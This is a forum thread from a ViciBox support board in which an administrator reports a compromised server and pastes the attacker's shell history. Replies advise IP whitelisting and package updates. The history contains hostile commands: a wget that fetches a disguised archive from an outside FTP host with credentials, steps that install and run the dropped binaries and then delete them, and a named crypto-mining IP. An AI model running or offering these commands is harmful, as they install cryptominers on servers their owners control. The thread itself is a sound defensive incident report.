Apache 2.4 Exploit

Support forum for the ViciBox ISO Server Install and ISO LiveCD Demo

Moderators: enjay, williamconley, Staydog, mflorell, MJCoate, mcargile, Kumba

Apache 2.4 Exploit

Postby Nefariousparity » Mon Apr 22, 2019 7:59 pm

This server that I had,
VERSION: 2.14-708a
BUILD: 190414-0924
© 2019 ViciDial Group

Asterisk: 11.25.3-vici
SVN:3093

Version: 2.14b0.5
SVN Version: 3093
DB Schema Version: 1569
DB Schema Update Date: 2019-04-22 17:36:10

So far, here is the information I have gathered.

The attack works on dated version of Apache, I found this recent update on for opensuse.
https://lwn.net/Articles/785668/

The commands used in the attack are

cd /var/wwhmtl
331 cd /var/www/html
332 ls
333 cd /src/www/htdocs
334 locate httpd.conf
335 cat /etc/apache2/httpd.conf | grep DocumentRoot
336 zypper install -y libz.so.1 binutils gcc make gcc-c++
337 wget ftp://alias:password@90.181.191.230:/osdf.pdf
338 tar xvfz osdf.pdf
339 cd back
340 cp libcrypto.so.6 /usr/lib
341 ./zap
342 ./scp
343 ./inst
344 cd ..;rm -rf osdf.pdf; rm -rf back ;
345 cat /proc/cpuinfo| grep "processor"| wc -l

Zap is a service used to find more exploits in a system.
https://www.owasp.org/index.php/OWASP_Z ... xy_Project

You will notice all crontab entries are gone.

If you do a netstat -alnp one IP you may see is

5.196.58.15

Which leads to a Cyrpto mining site.

It would appear the goal is to turn your servers in to cyrpto miners and more. Resolution burn it down an rebuild, update and have stronger firewall.
|| DB Schema Version: 1609 || Asterisk 11.25.1-vici || BUILD: 190902-0839 ||VERSION: 2.14-718a||SVN: 3133||10xTelephony||1x Database||1x Slave||1x Web||1x Archive||ViciBox v.8.0.1
Nefariousparity
 
Posts: 327
Joined: Wed Sep 12, 2012 7:01 pm

Re: Apache 2.4 Exploit

Postby williamconley » Mon Apr 22, 2019 8:17 pm

Whitelist Lockdown your servers. There will always be another exploit. Anything less than a whitelist is an invitation.
Vicidial Installation and Repair, plus Hosting and Colocation
Newest Product: Vicidial Agent Only Beep - Beta
http://www.PoundTeam.com # 352-269-0000 # +44(203) 769-2294
williamconley
 
Posts: 20018
Joined: Wed Oct 31, 2007 4:17 pm
Location: Davenport, FL (By Disney!)

Re: Apache 2.4 Exploit

Postby Nefariousparity » Mon Apr 22, 2019 8:32 pm

William, I totally agree.
|| DB Schema Version: 1609 || Asterisk 11.25.1-vici || BUILD: 190902-0839 ||VERSION: 2.14-718a||SVN: 3133||10xTelephony||1x Database||1x Slave||1x Web||1x Archive||ViciBox v.8.0.1
Nefariousparity
 
Posts: 327
Joined: Wed Sep 12, 2012 7:01 pm

Re: Apache 2.4 Exploit

Postby Kumba » Fri May 03, 2019 1:08 pm

A white list is the way to go as long as it's being adequately maintained. Hell hath no fury like someone who can't login to something they could 30 minutes ago because their at-home IP changed. :)

Looks like if you are running Apache greater then 2.4.23 you should have this fix rolled into it already. So for those who are using ViciBox v.8.0 and up it should be as simple as running 'zypper up' to get this fix. Older versions not so much.
Kumba
 
Posts: 939
Joined: Tue Oct 16, 2007 11:44 pm
Location: Florida

Re: Apache 2.4 Exploit

Postby williamconley » Fri May 03, 2019 1:18 pm

Kumba wrote:Hell hath no fury like someone who can't login to something they could 30 minutes ago because their at-home IP changed. :)

Which is why many of our clients who have agents with rotating IPs will use the Dynamic Link as the agent's primary login (and in fact will generate one link per agent for ease of lockout down the road).

Still "Two Button Clicks" to log in just like the regular login pages from vicidial.
Vicidial Installation and Repair, plus Hosting and Colocation
Newest Product: Vicidial Agent Only Beep - Beta
http://www.PoundTeam.com # 352-269-0000 # +44(203) 769-2294
williamconley
 
Posts: 20018
Joined: Wed Oct 31, 2007 4:17 pm
Location: Davenport, FL (By Disney!)


Return to ViciBox Server Install and Demo

Who is online

Users browsing this forum: No registered users and 61 guests